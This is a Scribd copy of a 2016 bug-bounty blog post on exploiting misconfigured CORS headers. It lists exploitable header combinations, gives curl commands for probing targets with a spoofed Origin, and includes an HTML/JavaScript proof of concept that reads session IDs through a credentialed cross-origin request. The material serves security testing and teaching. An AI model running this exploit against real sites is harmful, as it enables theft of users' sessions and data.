Scribd
Upload
109 views4 pages

Exploiting Misconfigured CORS

The document discusses exploiting misconfigured CORS (Cross-Origin Resource Sharing) configurations to gain unauthorized access to users' data. It provides examples of CORS configurations that could be exploitable, including allowing any origin with credentials or reflecting the request origin with credentials enabled. The document also demonstrates a proof-of-concept exploit code to extract session IDs from a vulnerable site using CORS requests with credentials.

Uploaded by

Shahirul Azam
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
109 views4 pages

Exploiting Misconfigured CORS

The document discusses exploiting misconfigured CORS (Cross-Origin Resource Sharing) configurations to gain unauthorized access to users' data. It provides examples of CORS configurations that could be exploitable, including allowing any origin with credentials or reflecting the request origin with credentials enabled. The document also demonstrates a proof-of-concept exploit code to extract session IDs from a vulnerable site using CORS requests with credentials.

Uploaded by

Shahirul Azam
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 4

Exploiting Misconfigured CORS (Cross

Origin Resource Sharing)


December 16, 2016Geekboy

Hello Friends!

few days before noticed a blog post for exploiting facebook chat and reading all the chats of
users so that made me to interested to know about the issues, and basically it was misconfigured
CORS configuration where null origin is allowed with credentials true,  it was not something
heard for the 1st time, @albinowax from the portswigger explained it very well in his blog post,
so after reading that messenger blog post i went to test for the same issue for some targets where
i allowed to test it.

but before that here are some tips about CORS where it can be exploitable from attackers point
of view:

 Poorly implemented, Best case for Attack:

Access-Control-Allow-Origin: https://attacker.com

Access-Control-Allow-Credentials: true

 Poorly implemented, Exploitable:

Access-Control-Allow-Origin: null

Access-Control-Allow-Credentials: true

 Bad implementation but not exploitable:

Access-Control-Allow-Origin: *

Access-Control-Allow-Credentials: true

or just

Access-Control-Allow-Origin: *

even this is not good from development point of view but due to own rules of CORS if Access-
Control-Allow-Origin set to * we don’t get benefit Access-Control-Allow-Credentials: true
means no cookie access of the victim.

When you can’t exploit even if above misconfigurations are present:


 Presence of any custom header in the request which is getting used to authenticate the
user.
 Presence of any unique/authentication/key in the request URI  

am not going to more deep about CORS, as earlier blog post covered it very well.
so in above i mentioned 3 cases where first two cases is exploitable in that eg of 2nd case is that
Facebook Messenger chat issue which i mentioned in earlier section of the post, and eg of 1st
case is mine which i found 2 days before only where any arbitrary Origin is allowed and
same Origin get reflected back to Access-Control-Allow-Origin with Credentials set to True,
the best way i found to check for CORS issue is using CURL.

eg : curl https://test.victim.com -H "Origin: https://geekboy.ninja" -I and check


the response if Origin is reflected in the response or not.

OR if your burp pro user, Burp Active Scan may find this for you, but in mine case it didnt, idk
the reason, when i CURLed my target manully curl https://my.target.com -H "Origin:
https://geekboy.ninja" -I , the Origin didnt got reflected but when i curled specifc endpoint
where all users data getting back into response curl https://my.target.com/api/web/user
-H "Origin: https://geekboy.ninja" -I it reflected back with my host with Credentials
set to True and that’s enough to make this work and steal all that data.

i made quick poc code for it

<!DOCTYPE html>
<html>
<body>
<center>
1
2
<!DOCTYPE html>
3
<html>
4
<body>
5
<center>
6
<h2>CORS POC Exploit</h2>
7
<h3>Extract SID</h3>
8
<div id="demo">
9
<button type="button" onclick="cors()">Exploit</button>
10
</div>
11
<script>
12
function cors() {
13
  var xhttp = new XMLHttpRequest();
14
  xhttp.onreadystatechange = function() {
15
    if (this.readyState == 4 && this.status == 200) {
16
      document.getElementById("demo").innerHTML = alert(this.responseText);
17
    }
18
  };
19
  xhttp.open("GET", "https://target.com/info/", true);
20
  xhttp.withCredentials = true;
21
  xhttp.send();
22
}
23
</script>
24
</body>
25
</html>
26
27

And here how it worked 🙂


Sources for better understanding of CORS:

 http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html
 https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS
 https://ejj.io/misconfigured-cors/

Ref: https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy